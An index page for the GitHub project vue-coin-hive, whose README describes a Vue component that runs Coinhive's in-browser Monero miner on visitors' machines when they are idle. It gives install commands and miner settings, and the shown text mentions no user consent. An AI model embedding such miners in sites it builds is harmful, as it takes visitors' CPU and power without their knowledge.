Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/jasonshin/vue-coin-hive
Start mining coins in your Vue projects in 1 second.
https://github.com/jasonshin/vue-coin-hive
coin cryptocurrency monero vue vue2
Last synced: 20 days ago
JSON representation
Start mining coins in your Vue projects in 1 second.
- Host: GitHub
- URL: https://github.com/jasonshin/vue-coin-hive
- Owner: JasonShin
- Created: 2017-09-20T11:24:25.000Z (about 7 years ago)
- Default Branch: master
- Last Pushed: 2017-11-27T11:56:02.000Z (almost 7 years ago)
- Last Synced: 2024-04-26T21:03:42.116Z (7 months ago)
- Topics: coin, cryptocurrency, monero, vue, vue2
- Language: Vue
- Homepage:
- Size: 29.3 KB
- Stars: 13
- Watchers: 3
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Vue Coin Hive
> Mine cryptocurrency while your users haven’t engaged with your content lately. Inspired by the last paragraph of [this article](https://cdb.reacttraining.com/announcing-react-idle-8fc0b9e2d33e).
> This uses [Coin-Hive](https://coin-hive.com/) to mine [Monero (XMR)](https://getmonero.org/).## Installation
### Using yarn
`yarn add vue-coin-hive`
### Using npm
`npm i --save vue-coin-hive`
# Usage
```vue
```
## API
| Name | Type | Default | Description |
|------------------------|---------|------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| start | Boolean | true | Starts the miner |
| startMode | String | IF_EXCLUSIVE_TAB | Connect to the pool and start mining. The optional mode parameter specifies how the miner should behave if a miner in another tab is already running. The default is CoinHive.IF_EXCLUSIVE_TAB. |
| siteKey | String | | Your public Site-Key. [See Settings » Sites.](https://coin-hive.com/settings/sites) |
| userName | String | null | A unique identifier for the user account on your website. This can be a userId, an email address, the user's nick name or (if you don't want to share your user names with our service) the md5 hash or otherwise obfuscated name of the user. Max length: 128 chars, case insensitive. |
| threads | Number | 2 | The number of threads the miner should start with. The default is navigator.hardwareConcurrency, i.e. the number of CPU cores available on the user's computer. |
| throttle | Number | 0 | The fraction of time that threads should be idle. See miner.setThrottle() for a detailed explanation. The default is 0. |
| enableFound | Boolean | true | Enables miner on found event hook. You can bind an event found ``` @:found='yourMethod' |
| enableAccepted | Boolean | true | Enables miner on accepted event hook. You can bind an event accepted ``` @:accepted='yourMethod' ``` |
| enableUpdatesPerSecond | Boolean | true | Enables getHashesPerSecond event
| proxy | Array | null | Set proxies to different pool than coinhive (must be a stratum pool), and you need to set your proxy [See how here](https://github.com/cazala/coin-hive-stratum). Enter as `siteKey` your monero address.## Public API
- *v-bind:found* : returns payload received from miner.on('found')
- *v-bind:accepted* : return payload received from miner.on('accepted)
- *v-bind:updatePerSecond* : return payload received from getHashesPerSecond, getTotalHashes, getAcceptedHashes## Roadmap
- Mining indicator for users
## License
This project is licensed under [MIT License](http://en.wikipedia.org/wiki/MIT_License)
I have nothing to do with coinhive